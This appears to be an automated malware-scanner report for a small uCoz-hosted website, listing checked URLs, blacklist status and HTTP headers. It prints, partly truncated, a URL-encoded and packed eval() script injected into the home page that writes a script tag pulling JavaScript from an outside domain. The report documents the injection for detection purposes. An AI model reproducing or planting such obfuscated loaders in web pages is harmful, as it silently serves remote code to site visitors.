New scan:

Malware Scanner report for all-for-cs.do.am

Malicious/Suspicious/Total urls checked
1/0/11
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://all-for-cs.do.am/
200 OK
Content-Length: 89609
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

q="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28q%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Bq%3Dq.replace%
... 245 bytes are skipped ...
05%3D%5C%5C%22c%2F2%5C%5C%22%20d%3D%5C%5C%22l-1%22%2B%22j%5C%5C%22%20%22%2B%22k%22%2B%22%3D%5C%5C%22i%3A%2F%2Fh.e%2Ff.g%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C22%2C22%2C%27script%7C%7CJavaScript%7C674%7Clanguage%7Ctype%7C68%7Ctm%7Cdocument%7Cwrite%7Cizs%7C19339%7Ctext%7Ccharset%7Ccom%7Cj65%7Cphp%7Cmekadr%7Chttp%7C251%7Csrc%7Cwindows%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";q=q.replace(/в/g,"5C");q=q.replace(/г/g,"3D");q=q.replace(/д/g,"2C");document.write(unescape(q));

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://s19.ucoz.net/src/jquery-1.6.1.js
200 OK
Content-Length: 101532
Content-Type: text/javascript
clean
http://s19.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s19.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean
http://all-for-cs.do.am//ads.people-group.net/111921/1/4/1/
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://all-for-cs.do.am/test404page.js
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://all-for-sites.ucoz.ru/js/csblok.js
503 Service Temporarily Unavailable
Content-Length: 2718
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js
200 OK
Content-Length: 93100
Content-Type: text/javascript
clean
http://all-for-sites.ucoz.ru/.serr/js/core.js
200 OK
Content-Length: 414
Content-Type: text/javascript
clean
http://all-for-sites.ucoz.ru/js/
503 Service Temporarily Unavailable
Content-Length: 2718
Content-Type: text/html
clean
http://all-for-cs.do.am//ads.people-group.net/111921/1/3/1/
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: all-for-cs.do.am

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Thu, 22 Jan 2015 19:48:03 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 8all-for-csuCoz=; path=/; expires=Tue, 22-Jan-2013 19:48:03 GMT; domain=.all-for-cs.do.am;
Set-Cookie: 8all-for-csuzll=1421956083; path=/; expires=Fri, 22-Jan-2016 19:48:03 GMT; domain=.all-for-cs.do.am;
Set-Cookie: ucvid=GekGq40hwT; path=/; expires=Fri, 22-Jan-2016 19:48:03 GMT
Set-Cookie: 8all-for-csuCoz=; path=/; expires=Tue, 22-Jan-2013 19:48:03 GMT; domain=.all-for-cs.do.am;
Second query (visit from search engine):
GET / HTTP/1.1
Host: all-for-cs.do.am
Referer: http://www.google.com/search?q=all-for-cs.do.am

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=all-for-cs.do.am

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://all-for-cs.do.am/

Result: all-for-cs.do.am is not infected or malware details are not published yet.